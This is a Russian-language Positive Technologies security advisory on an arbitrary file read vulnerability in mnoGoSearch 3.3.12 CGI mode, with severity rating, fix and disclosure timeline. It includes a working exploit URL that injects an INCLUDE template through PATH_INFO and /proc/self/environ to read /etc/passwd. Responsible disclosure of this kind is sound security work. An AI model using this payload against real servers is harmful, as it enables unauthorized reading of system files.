PT-2013-17: Чтение произвольных файлов в mnoGoSearch

Уязвимое ПО

mnoGoSearch
Версия: 3.3.12 и более ранняя

Ссылка: 
http://www.mnogosearch.org/

Рейтинг опасности

Уровень опасности: высокий 
Воздействие: чтение произвольных файлов
Вектор атаки: удаленный

CVSS v2: 
Base Score: 7.8 
Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N) 

CVE: отсутствует

Описание программы

mnoGoSearch - универсальная поисковая система для локальных и глобальных серверов.

Описание уязвимости

Специалисты исследовательского центра компании Positive Technologies обнаружили уязвимость "Чтение произвольных файлов" в приложении mnoGoSearch.

Передавая параметров запуска через QUERY_STRING (http://tools.ietf.org/html/draft-robinson-www-interface-00#section-7) для приложения, запущенного в CGI-режиме, можно определить переменную "d", отвечающую за путь к шаблону страницы. Сформировав на сервере файл шаблона и указав его в переменной "d" можно реализовать чтение произвольных файлов через конструкцию шаблона <!INCLUDE CONTENT="URI">.

Пример эксплуатации

В качестве шаблона возможно использование файла "/proc/self/environ", в котором через переменную окружения PATH_INFO формируется часть шаблона.

<!--top-->
<!INCLUDE CONTENT="file:/etc/passwd">
<!--/top-->

http://host/cgi-bin/search.cgi/%0A%3C!--top--%3E%0A%3C!INCLUDE%20CONTENT=%22file:/etc/passwd%22%3E%0A%3C!--/top--%3E?-d/proc/self/environ

Решение

Установите последнюю версию приложения.

Статус уведомления

15.02.2013 - Производителю отправлены детали уязвимости
01.03.2013 - Производитель выпустил исправление
05.03.2013 - Публикация уязвимости

Благодарности

Уязвимость обнаружил Сергей Бобров (Исследовательcкий центр Positive Research компании Positive Technologies)

Ссылки

http://www.securitylab.ru/lab/PT-2013-17
http://www.mnogosearch.org/bugs/index.php?id=4818

Список отчетов о ранее обнаруженных уязвимостях Positive Research:

http://www.ptsecurity.ru/lab/advisory/
http://www.securitylab.ru/lab/